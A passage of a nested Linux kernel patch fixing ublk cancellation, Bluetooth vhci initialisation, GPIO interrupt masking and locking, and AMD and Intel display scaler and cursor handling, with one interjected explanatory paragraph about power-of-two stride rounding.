+ /* Cancel all pending commands, must be called after del_gendisk() returns */
+@@ -1113,7 +1117,6 @@ static void __ublk_quiesce_dev(struct ublk_device *ub)
+ 	blk_mq_quiesce_queue(ub->ub_disk->queue);
+ 	ublk_wait_tagset_rqs_idle(ub);
+ 	ub->dev_info.state = UBLK_S_DEV_QUIESCED;
+-	ublk_cancel_dev(ub);
+ 	/* we are going to release task_struct of ubq_daemon and resets
+ 	 * ->ubq_daemon to NULL. So in monitor_work, check on ubq_daemon causes UAF.
+ 	 * Besides, monitor_work is not necessary in QUIESCED state since we have
+@@ -1136,6 +1139,7 @@ static void ublk_quiesce_work_fn(struct work_struct *work)
+ 	__ublk_quiesce_dev(ub);
+  unlock:
+ 	mutex_unlock(&ub->mutex);
++	ublk_cancel_dev(ub);
+ }
+ 
+ static void ublk_unquiesce_dev(struct ublk_device *ub)
+@@ -1175,8 +1179,8 @@ static void ublk_stop_dev(struct ublk_device *ub)
+ 	put_disk(ub->ub_disk);
+ 	ub->ub_disk = NULL;
+  unlock:
+-	ublk_cancel_dev(ub);
+ 	mutex_unlock(&ub->mutex);
++	ublk_cancel_dev(ub);
+ 	cancel_delayed_work_sync(&ub->monitor_work);
+ }
+ 
+@@ -1353,6 +1357,7 @@ static int ublk_init_queue(struct ublk_device *ub, int q_id)
+ 	void *ptr;
+ 	int size;
+ 
++	spin_lock_init(&ubq->cancel_lock);
+ 	ubq->flags = ub->dev_info.flags;
+ 	ubq->q_id = q_id;
+ 	ubq->q_depth = ub->dev_info.queue_depth;
+@@ -1882,8 +1887,9 @@ static void ublk_queue_reinit(struct ublk_device *ub, struct ublk_queue *ubq)
+ 	int i;
+ 
+ 	WARN_ON_ONCE(!(ubq->ubq_daemon && ubq_daemon_is_dying(ubq)));
++
+ 	/* All old ioucmds have to be completed */
+-	WARN_ON_ONCE(ubq->nr_io_ready);
++	ubq->nr_io_ready = 0;
+ 	/* old daemon is PF_EXITING, put it now */
+ 	put_task_struct(ubq->ubq_daemon);
+ 	/* We have to reset it to NULL, otherwise ub won't accept new FETCH_REQ */
+diff --git a/drivers/bluetooth/hci_vhci.c b/drivers/bluetooth/hci_vhci.c
+index 4415d850d698b..44dc91555aa00 100644
+--- a/drivers/bluetooth/hci_vhci.c
++++ b/drivers/bluetooth/hci_vhci.c
+@@ -11,6 +11,7 @@
+ #include <linux/module.h>
+ #include <asm/unaligned.h>
+ 
++#include <linux/atomic.h>
+ #include <linux/kernel.h>
+ #include <linux/init.h>
+ #include <linux/slab.h>
+@@ -44,6 +45,7 @@ struct vhci_data {
+ 	bool wakeup;
+ 	__u16 msft_opcode;
+ 	bool aosp_capable;
++	atomic_t initialized;
+ };
+ 
+ static int vhci_open_dev(struct hci_dev *hdev)
+@@ -75,11 +77,10 @@ static int vhci_send_frame(struct hci_dev *hdev, struct sk_buff *skb)
+ 
+ 	memcpy(skb_push(skb, 1), &hci_skb_pkt_type(skb), 1);
+ 
+-	mutex_lock(&data->open_mutex);
+ 	skb_queue_tail(&data->readq, skb);
+-	mutex_unlock(&data->open_mutex);
+ 
+-	wake_up_interruptible(&data->read_wait);
++	if (atomic_read(&data->initialized))
++		wake_up_interruptible(&data->read_wait);
+ 	return 0;
+ }
+ 
+@@ -363,7 +364,8 @@ static int __vhci_create_device(struct vhci_data *data, __u8 opcode)
+ 	skb_put_u8(skb, 0xff);
+ 	skb_put_u8(skb, opcode);
+ 	put_unaligned_le16(hdev->id, skb_put(skb, 2));
+-	skb_queue_tail(&data->readq, skb);
++	skb_queue_head(&data->readq, skb);
++	atomic_inc(&data->initialized);
+ 
+ 	wake_up_interruptible(&data->read_wait);
+ 	return 0;
+diff --git a/drivers/bus/ti-sysc.c b/drivers/bus/ti-sysc.c
+index 59a2fe2448f17..15c6b85b125d4 100644
+--- a/drivers/bus/ti-sysc.c
++++ b/drivers/bus/ti-sysc.c
+@@ -2174,13 +2174,23 @@ static int sysc_reset(struct sysc *ddata)
+ 		sysc_val = sysc_read_sysconfig(ddata);
+ 		sysc_val |= sysc_mask;
+ 		sysc_write(ddata, sysc_offset, sysc_val);
+-		/* Flush posted write */
++
++		/*
++		 * Some devices need a delay before reading registers
++		 * after reset. Presumably a srst_udelay is not needed
++		 * for devices that use a rstctrl register reset.
++		 */
++		if (ddata->cfg.srst_udelay)
++			fsleep(ddata->cfg.srst_udelay);
++
++		/*
++		 * Flush posted write. For devices needing srst_udelay
++		 * this should trigger an interconnect error if the
++		 * srst_udelay value is needed but not configured.
++		 */
+ 		sysc_val = sysc_read_sysconfig(ddata);
+ 	}
+ 
+-	if (ddata->cfg.srst_udelay)
+-		fsleep(ddata->cfg.srst_udelay);
+-
+ 	if (ddata->post_reset_quirk)
+ 		ddata->post_reset_quirk(ddata);
+ 
+diff --git a/drivers/gpio/gpio-dwapb.c b/drivers/gpio/gpio-dwapb.c
+index c22fcaa44a614..6b7d47a52b10a 100644
+--- a/drivers/gpio/gpio-dwapb.c
++++ b/drivers/gpio/gpio-dwapb.c
+@@ -283,13 +283,15 @@ static void dwapb_irq_enable(struct irq_data *d)
+ {
+ 	struct gpio_chip *gc = irq_data_get_irq_chip_data(d);
+ 	struct dwapb_gpio *gpio = to_dwapb_gpio(gc);
++	irq_hw_number_t hwirq = irqd_to_hwirq(d);
+ 	unsigned long flags;
+ 	u32 val;
+ 
+ 	raw_spin_lock_irqsave(&gc->bgpio_lock, flags);
+-	val = dwapb_read(gpio, GPIO_INTEN);
+-	val |= BIT(irqd_to_hwirq(d));
++	val = dwapb_read(gpio, GPIO_INTEN) | BIT(hwirq);
+ 	dwapb_write(gpio, GPIO_INTEN, val);
++	val = dwapb_read(gpio, GPIO_INTMASK) & ~BIT(hwirq);
++	dwapb_write(gpio, GPIO_INTMASK, val);
+ 	raw_spin_unlock_irqrestore(&gc->bgpio_lock, flags);
+ }
+ 
+@@ -297,12 +299,14 @@ static void dwapb_irq_disable(struct irq_data *d)
+ {
+ 	struct gpio_chip *gc = irq_data_get_irq_chip_data(d);
+ 	struct dwapb_gpio *gpio = to_dwapb_gpio(gc);
++	irq_hw_number_t hwirq = irqd_to_hwirq(d);
+ 	unsigned long flags;
+ 	u32 val;
+ 
+ 	raw_spin_lock_irqsave(&gc->bgpio_lock, flags);
+-	val = dwapb_read(gpio, GPIO_INTEN);
+-	val &= ~BIT(irqd_to_hwirq(d));
++	val = dwapb_read(gpio, GPIO_INTMASK) | BIT(hwirq);
++	dwapb_write(gpio, GPIO_INTMASK, val);
++	val = dwapb_read(gpio, GPIO_INTEN) & ~BIT(hwirq);
+ 	dwapb_write(gpio, GPIO_INTEN, val);
+ 	raw_spin_unlock_irqrestore(&gc->bgpio_lock, flags);
+ }
+diff --git a/drivers/gpio/gpiolib-cdev.c b/drivers/gpio/gpiolib-cdev.c
+index 6ab1cf489d035..e40c93f0960b4 100644
+--- a/drivers/gpio/gpiolib-cdev.c
++++ b/drivers/gpio/gpiolib-cdev.c
+@@ -2444,10 +2444,7 @@ static int lineinfo_unwatch(struct gpio_chardev_data *cdev, void __user *ip)
+ 	return 0;
+ }
+ 
+-/*
+- * gpio_ioctl() - ioctl handler for the GPIO chardev
+- */
+-static long gpio_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
++static long gpio_ioctl_unlocked(struct file *file, unsigned int cmd, unsigned long arg)
+ {
+ 	struct gpio_chardev_data *cdev = file->private_data;
+ 	struct gpio_device *gdev = cdev->gdev;
+@@ -2484,6 +2481,17 @@ static long gpio_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
+ 	}
+ }
+ 
++/*
++ * gpio_ioctl() - ioctl handler for the GPIO chardev
++ */
++static long gpio_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
++{
++	struct gpio_chardev_data *cdev = file->private_data;
++
++	return call_ioctl_locked(file, cmd, arg, cdev->gdev,
++				 gpio_ioctl_unlocked);
++}
++
+ #ifdef CONFIG_COMPAT
+ static long gpio_ioctl_compat(struct file *file, unsigned int cmd,
+ 			      unsigned long arg)
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 6d5f3c5fb4a62..13e0b521e3dba 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -5104,6 +5104,9 @@ static void fill_dc_dirty_rects(struct drm_plane *plane,
+ 	if (plane->type == DRM_PLANE_TYPE_CURSOR)
+ 		return;
+ 
++	if (new_plane_state->rotation != DRM_MODE_ROTATE_0)
++		goto ffu;
++
+ 	num_clips = drm_plane_get_damage_clips_count(new_plane_state);
+ 	clips = drm_plane_get_damage_clips(new_plane_state);
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dc_hw_types.h b/drivers/gpu/drm/amd/display/dc/dc_hw_types.h
+index 848db8676adfd..46c2b991aa108 100644
+--- a/drivers/gpu/drm/amd/display/dc/dc_hw_types.h
++++ b/drivers/gpu/drm/amd/display/dc/dc_hw_types.h
+@@ -465,6 +465,7 @@ struct dc_cursor_mi_param {
+ 	struct fixed31_32 v_scale_ratio;
+ 	enum dc_rotation_angle rotation;
+ 	bool mirror;
++	struct dc_stream_state *stream;
+ };
+ 
+ /* IPP related types */
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
+index d84579da64003..009b5861a3fec 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
+@@ -3427,7 +3427,8 @@ void dcn10_set_cursor_position(struct pipe_ctx *pipe_ctx)
+ 		.h_scale_ratio = pipe_ctx->plane_res.scl_data.ratios.horz,
+ 		.v_scale_ratio = pipe_ctx->plane_res.scl_data.ratios.vert,
+ 		.rotation = pipe_ctx->plane_state->rotation,
+-		.mirror = pipe_ctx->plane_state->horizontal_mirror
++		.mirror = pipe_ctx->plane_state->horizontal_mirror,
++		.stream = pipe_ctx->stream,
+ 	};
+ 	bool pipe_split_on = false;
+ 	bool odm_combine_on = (pipe_ctx->next_odm_pipe != NULL) ||
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hubp.c b/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hubp.c
+index 4566bc7abf17e..aa252dc263267 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hubp.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hubp.c
+@@ -1075,8 +1075,16 @@ void hubp2_cursor_set_position(
+ 	if (src_y_offset < 0)
+ 		src_y_offset = 0;
+ 	/* Save necessary cursor info x, y position. w, h is saved in attribute func. */
+-	hubp->cur_rect.x = src_x_offset + param->viewport.x;
+-	hubp->cur_rect.y = src_y_offset + param->viewport.y;
++	if (param->stream->link->psr_settings.psr_version >= DC_PSR_VERSION_SU_1 &&
++	    param->rotation != ROTATION_ANGLE_0) {
++		hubp->cur_rect.x = 0;
++		hubp->cur_rect.y = 0;
++		hubp->cur_rect.w = param->stream->timing.h_addressable;
++		hubp->cur_rect.h = param->stream->timing.v_addressable;
++	} else {
++		hubp->cur_rect.x = src_x_offset + param->viewport.x;
++		hubp->cur_rect.y = src_y_offset + param->viewport.y;
++	}
+ }
+ 
+ void hubp2_clk_cntl(struct hubp *hubp, bool enable)
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c
+index 53262f6bc40b0..72bec33e371f3 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c
+@@ -994,5 +994,8 @@ void dcn30_prepare_bandwidth(struct dc *dc,
+ 			dc->clk_mgr->funcs->set_max_memclk(dc->clk_mgr, dc->clk_mgr->bw_params->clk_table.entries[dc->clk_mgr->bw_params->clk_table.num_entries - 1].memclk_mhz);
+ 
+ 	dcn20_prepare_bandwidth(dc, context);
++
++	dc_dmub_srv_p_state_delegate(dc,
++		context->bw_ctx.bw.dcn.clk.fw_based_mclk_switching, context);
+ }
+ 
+diff --git a/drivers/gpu/drm/i915/display/intel_atomic.c b/drivers/gpu/drm/i915/display/intel_atomic.c
+index 18f0a5ae3bacd..a502af0b6dd47 100644
+--- a/drivers/gpu/drm/i915/display/intel_atomic.c
++++ b/drivers/gpu/drm/i915/display/intel_atomic.c
+@@ -41,6 +41,7 @@
+ #include "intel_global_state.h"
+ #include "intel_hdcp.h"
+ #include "intel_psr.h"
++#include "intel_fb.h"
+ #include "skl_universal_plane.h"
+ 
+ /**
+@@ -302,198 +303,6 @@ intel_crtc_destroy_state(struct drm_crtc *crtc,
+ 	kfree(crtc_state);
+ }
+ 
+-static void intel_atomic_setup_scaler(struct intel_crtc_scaler_state *scaler_state,
+-				      int num_scalers_need, struct intel_crtc *intel_crtc,
+-				      const char *name, int idx,
+-				      struct intel_plane_state *plane_state,
+-				      int *scaler_id)
+-{
+-	struct drm_i915_private *dev_priv = to_i915(intel_crtc->base.dev);
+-	int j;
+-	u32 mode;
+-
+-	if (*scaler_id < 0) {
+-		/* find a free scaler */
+-		for (j = 0; j < intel_crtc->num_scalers; j++) {
+-			if (scaler_state->scalers[j].in_use)
+-				continue;
+-
+-			*scaler_id = j;
+-			scaler_state->scalers[*scaler_id].in_use = 1;
+-			break;
+-		}
+-	}
+-
+-	if (drm_WARN(&dev_priv->drm, *scaler_id < 0,
+-		     "Cannot find scaler for %s:%d\n", name, idx))
+-		return;
+-
+-	/* set scaler mode */
+-	if (plane_state && plane_state->hw.fb &&
+-	    plane_state->hw.fb->format->is_yuv &&
+-	    plane_state->hw.fb->format->num_planes > 1) {
+-		struct intel_plane *plane = to_intel_plane(plane_state->uapi.plane);
+-		if (DISPLAY_VER(dev_priv) == 9) {
+-			mode = SKL_PS_SCALER_MODE_NV12;
+-		} else if (icl_is_hdr_plane(dev_priv, plane->id)) {
+-			/*
+-			 * On gen11+'s HDR planes we only use the scaler for
+-			 * scaling. They have a dedicated chroma upsampler, so
+-			 * we don't need the scaler to upsample the UV plane.
+-			 */
+-			mode = PS_SCALER_MODE_NORMAL;
+-		} else {
+-			struct intel_plane *linked =
+-				plane_state->planar_linked_plane;
+-
+-			mode = PS_SCALER_MODE_PLANAR;
+-
+-			if (linked)
+-				mode |= PS_PLANE_Y_SEL(linked->id);
+-		}
+-	} else if (DISPLAY_VER(dev_priv) >= 10) {
+-		mode = PS_SCALER_MODE_NORMAL;
+-	} else if (num_scalers_need == 1 && intel_crtc->num_scalers > 1) {
+-		/*
+-		 * when only 1 scaler is in use on a pipe with 2 scalers
+-		 * scaler 0 operates in high quality (HQ) mode.
+-		 * In this case use scaler 0 to take advantage of HQ mode
+-		 */
+-		scaler_state->scalers[*scaler_id].in_use = 0;
+-		*scaler_id = 0;
+-		scaler_state->scalers[0].in_use = 1;
+-		mode = SKL_PS_SCALER_MODE_HQ;
+-	} else {
+-		mode = SKL_PS_SCALER_MODE_DYN;
+-	}
+-
+-	drm_dbg_kms(&dev_priv->drm, "Attached scaler id %u.%u to %s:%d\n",
+-		    intel_crtc->pipe, *scaler_id, name, idx);
+-	scaler_state->scalers[*scaler_id].mode = mode;
+-}
+-
+-/**
+- * intel_atomic_setup_scalers() - setup scalers for crtc per staged requests
+- * @dev_priv: i915 device
+- * @intel_crtc: intel crtc
+- * @crtc_state: incoming crtc_state to validate and setup scalers
+- *
+- * This function sets up scalers based on staged scaling requests for
+- * a @crtc and its planes. It is called from crtc level check path. If request
+- * is a supportable request, it attaches scalers to requested planes and crtc.
+- *
+- * This function takes into account the current scaler(s) in use by any planes
+- * not being part of this atomic state
+- *
+- *  Returns:
+- *         0 - scalers were setup succesfully
+- *         error code - otherwise
+- */
+-int intel_atomic_setup_scalers(struct drm_i915_private *dev_priv,
+-			       struct intel_crtc *intel_crtc,
+-			       struct intel_crtc_state *crtc_state)
+-{
+-	struct drm_plane *plane = NULL;
+-	struct intel_plane *intel_plane;
+-	struct intel_plane_state *plane_state = NULL;
+-	struct intel_crtc_scaler_state *scaler_state =
+-		&crtc_state->scaler_state;
+-	struct drm_atomic_state *drm_state = crtc_state->uapi.state;
+-	struct intel_atomic_state *intel_state = to_intel_atomic_state(drm_state);
+-	int num_scalers_need;
+-	int i;
+-
+-	num_scalers_need = hweight32(scaler_state->scaler_users);
+-
+-	/*
+-	 * High level flow:
+-	 * - staged scaler requests are already in scaler_state->scaler_users
+-	 * - check whether staged scaling requests can be supported
+-	 * - add planes using scalers that aren't in current transaction
+-	 * - assign scalers to requested users
+-	 * - as part of plane commit, scalers will be committed
+-	 *   (i.e., either attached or detached) to respective planes in hw
+-	 * - as part of crtc_commit, scaler will be either attached or detached
+-	 *   to crtc in hw
+-	 */
+-
+-	/* fail if required scalers > available scalers */
+-	if (num_scalers_need > intel_crtc->num_scalers){
+-		drm_dbg_kms(&dev_priv->drm,
+-			    "Too many scaling requests %d > %d\n",
+-			    num_scalers_need, intel_crtc->num_scalers);
+-		return -EINVAL;
+-	}
+-
+-	/* walkthrough scaler_users bits and start assigning scalers */
+-	for (i = 0; i < sizeof(scaler_state->scaler_users) * 8; i++) {
+-		int *scaler_id;
+-		const char *name;
+-		int idx;
+-
+-		/* skip if scaler not required */
+-		if (!(scaler_state->scaler_users & (1 << i)))
+-			continue;
+-
+-		if (i == SKL_CRTC_INDEX) {
+-			name = "CRTC";
+-			idx = intel_crtc->base.base.id;
+-
+-			/* panel fitter case: assign as a crtc scaler */
+-			scaler_id = &scaler_state->scaler_id;
+-		} else {
+-			name = "PLANE";
+-
+-			/* plane scaler case: assign as a plane scaler */
+-			/* find the plane that set the bit as scaler_user */
+-			plane = drm_state->planes[i].ptr;
+-
+-			/*
+-			 * to enable/disable hq mode, add planes that are using scaler
+-			 * into this transaction
+-			 */
+-			if (!plane) {
+-				struct drm_plane_state *state;
+-
+-				/*
+-				 * GLK+ scalers don't have a HQ mode so it
+-				 * isn't necessary to change between HQ and dyn mode
+-				 * on those platforms.
+-				 */
+-				if (DISPLAY_VER(dev_priv) >= 10)
+-					continue;
+-
+-				plane = drm_plane_from_index(&dev_priv->drm, i);
+-				state = drm_atomic_get_plane_state(drm_state, plane);
+-				if (IS_ERR(state)) {
+-					drm_dbg_kms(&dev_priv->drm,
+-						    "Failed to add [PLANE:%d] to drm_state\n",
+-						    plane->base.id);
+-					return PTR_ERR(state);
+-				}
+-			}
+-
+-			intel_plane = to_intel_plane(plane);
+-			idx = plane->base.id;
+-
+-			/* plane on different crtc cannot be a scaler user of this crtc */
+-			if (drm_WARN_ON(&dev_priv->drm,
+-					intel_plane->pipe != intel_crtc->pipe))
+-				continue;
+-
+-			plane_state = intel_atomic_get_new_plane_state(intel_state,
+-								       intel_plane);
+-			scaler_id = &plane_state->scaler_id;
+-		}
+-
+-		intel_atomic_setup_scaler(scaler_state, num_scalers_need,
+-					  intel_crtc, name, idx,
+-					  plane_state, scaler_id);
+-	}
+-
+-	return 0;
+-}
+-
+ struct drm_atomic_state *
+ intel_atomic_state_alloc(struct drm_device *dev)
+ {
+diff --git a/drivers/gpu/drm/i915/display/intel_atomic.h b/drivers/gpu/drm/i915/display/intel_atomic.h
+index 1dc439983dd94..e506f6a873447 100644
+--- a/drivers/gpu/drm/i915/display/intel_atomic.h
++++ b/drivers/gpu/drm/i915/display/intel_atomic.h
+@@ -52,8 +52,4 @@ struct intel_crtc_state *
+ intel_atomic_get_crtc_state(struct drm_atomic_state *state,
+ 			    struct intel_crtc *crtc);
+ 
+-int intel_atomic_setup_scalers(struct drm_i915_private *dev_priv,
+-			       struct intel_crtc *intel_crtc,
+-			       struct intel_crtc_state *crtc_state);
+-
+ #endif /* __INTEL_ATOMIC_H__ */
+diff --git a/drivers/gpu/drm/i915/display/intel_display.c b/drivers/gpu/drm/i915/display/intel_display.c
+index 1777a12f2f421..fb8d1d63407a2 100644
+--- a/drivers/gpu/drm/i915/display/intel_display.c
++++ b/drivers/gpu/drm/i915/display/intel_display.c
+@@ -6481,6 +6481,17 @@ static int intel_async_flip_check_uapi(struct intel_atomic_state *state,
+ 		return -EINVAL;
+ 	}
+ 
++	/*
++	 * FIXME: Bigjoiner+async flip is busted currently.
++	 * Remove this check once the issues are fixed.
++	 */
++	if (new_crtc_state->bigjoiner_pipes) {
++		drm_dbg_kms(&i915->drm,
++			    "[CRTC:%d:%s] async flip disallowed with bigjoiner\n",
++			    crtc->base.base.id, crtc->base.name);
++		return -EINVAL;
++	}
++
+ 	for_each_oldnew_intel_plane_in_state(state, plane, old_plane_state,
+ 					     new_plane_state, i) {
+ 		if (plane->pipe != crtc->pipe)
+diff --git a/drivers/gpu/drm/i915/display/intel_fb.c b/drivers/gpu/drm/i915/display/intel_fb.c
+index 23d854bd73b77..c69a638796c62 100644
+--- a/drivers/gpu/drm/i915/display/intel_fb.c
++++ b/drivers/gpu/drm/i915/display/intel_fb.c
+@@ -1176,7 +1176,8 @@ bool intel_fb_needs_pot_stride_remap(const struct intel_framebuffer *fb)
+ {
+ 	struct drm_i915_private *i915 = to_i915(fb->base.dev);
+ 
+-	return IS_ALDERLAKE_P(i915) && fb->base.modifier != DRM_FORMAT_MOD_LINEAR;
++	return (IS_ALDERLAKE_P(i915) || DISPLAY_VER(i915) >= 14) &&
++		intel_fb_uses_dpt(&fb->base);
+ }
+ 
+ static int intel_fb_pitch(const struct intel_framebuffer *fb, int color_plane, unsigned int rotation)
+@@ -1312,9 +1313,11 @@ plane_view_scanout_stride(const struct intel_framebuffer *fb, int color_plane,
+ 			  unsigned int tile_width,
+ 			  unsigned int src_stride_tiles, unsigned int dst_stride_tiles)
+ {
++	struct drm_i915_private *i915 = to_i915(fb->base.dev);
+ 	unsigned int stride_tiles;
+ 
+-	if (IS_ALDERLAKE_P(to_i915(fb->base.dev)))
++	if ((IS_ALDERLAKE_P(i915) || DISPLAY_VER(i915) >= 14) &&
++	    src_stride_tiles < dst_stride_tiles)
+ 		stride_tiles = src_stride_tiles;
+ 	else
+ 		stride_tiles = dst_stride_tiles;
+@@ -1520,7 +1523,8 @@ static void intel_fb_view_init(struct drm_i915_private *i915, struct intel_fb_vi
+ 	memset(view, 0, sizeof(*view));
+ 	view->gtt.type = view_type;
+ 
+-	if (view_type == I915_GTT_VIEW_REMAPPED && IS_ALDERLAKE_P(i915))
++	if (view_type == I915_GTT_VIEW_REMAPPED &&
++	    (IS_ALDERLAKE_P(i915) || DISPLAY_VER(i915) >= 14))
+ 		view->gtt.remapped.plane_alignment = SZ_2M / PAGE_SIZE;
+ }
+ 
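
The intel_fb.c hunks above extend Alder Lake-P's power-of-two stride remapping to DISPLAY_VER >= 14 parts whose framebuffers go through the DPT. As a rough standalone illustration of what rounding a stride up to a power of two looks like (not the i915 remap code itself):

    #include <stdio.h>

    /* Round a stride, in tiles, up to the next power of two. */
    static unsigned int pot_stride(unsigned int stride_tiles)
    {
        unsigned int pot = 1;

        while (pot < stride_tiles)
            pot <<= 1;
        return pot;
    }

    int main(void)
    {
        /* a 48-tile-wide surface would be remapped to a 64-tile stride */
        printf("48 tiles -> %u tiles\n", pot_stride(48));
        return 0;
    }
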
+diff --git a/drivers/gpu/drm/i915/display/skl_scaler.c b/drivers/gpu/drm/i915/display/skl_scaler.c
+index 90f42f63128ec..0b74f91e865d0 100644
+--- a/drivers/gpu/drm/i915/display/skl_scaler.c
++++ b/drivers/gpu/drm/i915/display/skl_scaler.c
+@@ -337,6 +337,263 @@ int skl_update_scaler_plane(struct intel_crtc_state *crtc_state,
+ 	return 0;
+ }
+ 
++static int intel_atomic_setup_scaler(struct intel_crtc_scaler_state *scaler_state,
++				     int num_scalers_need, struct intel_crtc *intel_crtc,
++				     const char *name, int idx,
++				     struct intel_plane_state *plane_state,
++				     int *scaler_id)
++{
++	struct drm_i915_private *dev_priv = to_i915(intel_crtc->base.dev);
++	int j;
++	u32 mode;
++
++	if (*scaler_id < 0) {
++		/* find a free scaler */
++		for (j = 0; j < intel_crtc->num_scalers; j++) {
++			if (scaler_state->scalers[j].in_use)
++				continue;
++
++			*scaler_id = j;
++			scaler_state->scalers[*scaler_id].in_use = 1;
++			break;
++		}
++	}
++
++	if (drm_WARN(&dev_priv->drm, *scaler_id < 0,
++		     "Cannot find scaler for %s:%d\n", name, idx))
++		return -EINVAL;
++
++	/* set scaler mode */
++	if (plane_state && plane_state->hw.fb &&
++	    plane_state->hw.fb->format->is_yuv &&
++	    plane_state->hw.fb->format->num_planes > 1) {
++		struct intel_plane *plane = to_intel_plane(plane_state->uapi.plane);
++
++		if (DISPLAY_VER(dev_priv) == 9) {
++			mode = SKL_PS_SCALER_MODE_NV12;
++		} else if (icl_is_hdr_plane(dev_priv, plane->id)) {
++			/*
++			 * On gen11+'s HDR planes we only use the scaler for
++			 * scaling. They have a dedicated chroma upsampler, so
++			 * we don't need the scaler to upsample the UV plane.
++			 */
++			mode = PS_SCALER_MODE_NORMAL;
++		} else {
++			struct intel_plane *linked =
++				plane_state->planar_linked_plane;
++
++			mode = PS_SCALER_MODE_PLANAR;
++
++			if (linked)
++				mode |= PS_PLANE_Y_SEL(linked->id);
++		}
++	} else if (DISPLAY_VER(dev_priv) >= 10) {
++		mode = PS_SCALER_MODE_NORMAL;
++	} else if (num_scalers_need == 1 && intel_crtc->num_scalers > 1) {
++		/*
++		 * when only 1 scaler is in use on a pipe with 2 scalers
++		 * scaler 0 operates in high quality (HQ) mode.
++		 * In this case use scaler 0 to take advantage of HQ mode
++		 */
++		scaler_state->scalers[*scaler_id].in_use = 0;
++		*scaler_id = 0;
++		scaler_state->scalers[0].in_use = 1;
++		mode = SKL_PS_SCALER_MODE_HQ;
++	} else {
++		mode = SKL_PS_SCALER_MODE_DYN;
++	}
++
++	/*
++	 * FIXME: we should also check the scaler factors for pfit, so
++	 * this shouldn't be tied directly to planes.
++	 */
++	if (plane_state && plane_state->hw.fb) {
++		const struct drm_framebuffer *fb = plane_state->hw.fb;
++		const struct drm_rect *src = &plane_state->uapi.src;
++		const struct drm_rect *dst = &plane_state->uapi.dst;
++		int hscale, vscale, max_vscale, max_hscale;
++
++		/*
++		 * FIXME: When two scalers are needed, but only one of
++		 * them needs to downscale, we should make sure that
++		 * the one that needs downscaling support is assigned
++		 * as the first scaler, so we don't reject downscaling
++		 * unnecessarily.
++		 */
++
++		if (DISPLAY_VER(dev_priv) >= 14) {
++			/*
++			 * On versions 14 and up, only the first
++			 * scaler supports a vertical scaling factor
++			 * of more than 1.0, while a horizontal
++			 * scaling factor of 3.0 is supported.
++			 */
++			max_hscale = 0x30000 - 1;
++			if (*scaler_id == 0)
++				max_vscale = 0x30000 - 1;
++			else
++				max_vscale = 0x10000;
++
++		} else if (DISPLAY_VER(dev_priv) >= 10 ||
++			   !intel_format_info_is_yuv_semiplanar(fb->format, fb->modifier)) {
++			max_hscale = 0x30000 - 1;
++			max_vscale = 0x30000 - 1;
++		} else {
++			max_hscale = 0x20000 - 1;
++			max_vscale = 0x20000 - 1;
++		}
++
++		/*
++		 * FIXME: We should change the if-else block above to
++		 * support HQ vs dynamic scaler properly.
++		 */
++
++		/* Check if required scaling is within limits */
++		hscale = drm_rect_calc_hscale(src, dst, 1, max_hscale);
++		vscale = drm_rect_calc_vscale(src, dst, 1, max_vscale);
++
++		if (hscale < 0 || vscale < 0) {
++			drm_dbg_kms(&dev_priv->drm,
++				    "Scaler %d doesn't support required plane scaling\n",
++				    *scaler_id);
++			drm_rect_debug_print("src: ", src, true);
++			drm_rect_debug_print("dst: ", dst, false);
++
++			return -EINVAL;
++		}
++	}
++
++	drm_dbg_kms(&dev_priv->drm, "Attached scaler id %u.%u to %s:%d\n",
++		    intel_crtc->pipe, *scaler_id, name, idx);
++	scaler_state->scalers[*scaler_id].mode = mode;
++
++	return 0;
++}
++
++/**
++ * intel_atomic_setup_scalers() - setup scalers for crtc per staged requests
++ * @dev_priv: i915 device
++ * @intel_crtc: intel crtc
++ * @crtc_state: incoming crtc_state to validate and setup scalers
++ *
++ * This function sets up scalers based on staged scaling requests for
++ * a @crtc and its planes. It is called from crtc level check path. If request
++ * is a supportable request, it attaches scalers to requested planes and crtc.
++ *
++ * This function takes into account the current scaler(s) in use by any planes
++ * not being part of this atomic state
++ *
++ *  Returns:
++ *         0 - scalers were setup successfully
++ *         error code - otherwise
++ */
++int intel_atomic_setup_scalers(struct drm_i915_private *dev_priv,
++			       struct intel_crtc *intel_crtc,
++			       struct intel_crtc_state *crtc_state)
++{
++	struct drm_plane *plane = NULL;
++	struct intel_plane *intel_plane;
++	struct intel_crtc_scaler_state *scaler_state =
++		&crtc_state->scaler_state;
++	struct drm_atomic_state *drm_state = crtc_state->uapi.state;
++	struct intel_atomic_state *intel_state = to_intel_atomic_state(drm_state);
++	int num_scalers_need;
++	int i;
++
++	num_scalers_need = hweight32(scaler_state->scaler_users);
++
++	/*
++	 * High level flow:
++	 * - staged scaler requests are already in scaler_state->scaler_users
++	 * - check whether staged scaling requests can be supported
++	 * - add planes using scalers that aren't in current transaction
++	 * - assign scalers to requested users
++	 * - as part of plane commit, scalers will be committed
++	 *   (i.e., either attached or detached) to respective planes in hw
++	 * - as part of crtc_commit, scaler will be either attached or detached
++	 *   to crtc in hw
++	 */
++
++	/* fail if required scalers > available scalers */
++	if (num_scalers_need > intel_crtc->num_scalers) {
++		drm_dbg_kms(&dev_priv->drm,
++			    "Too many scaling requests %d > %d\n",
++			    num_scalers_need, intel_crtc->num_scalers);
++		return -EINVAL;
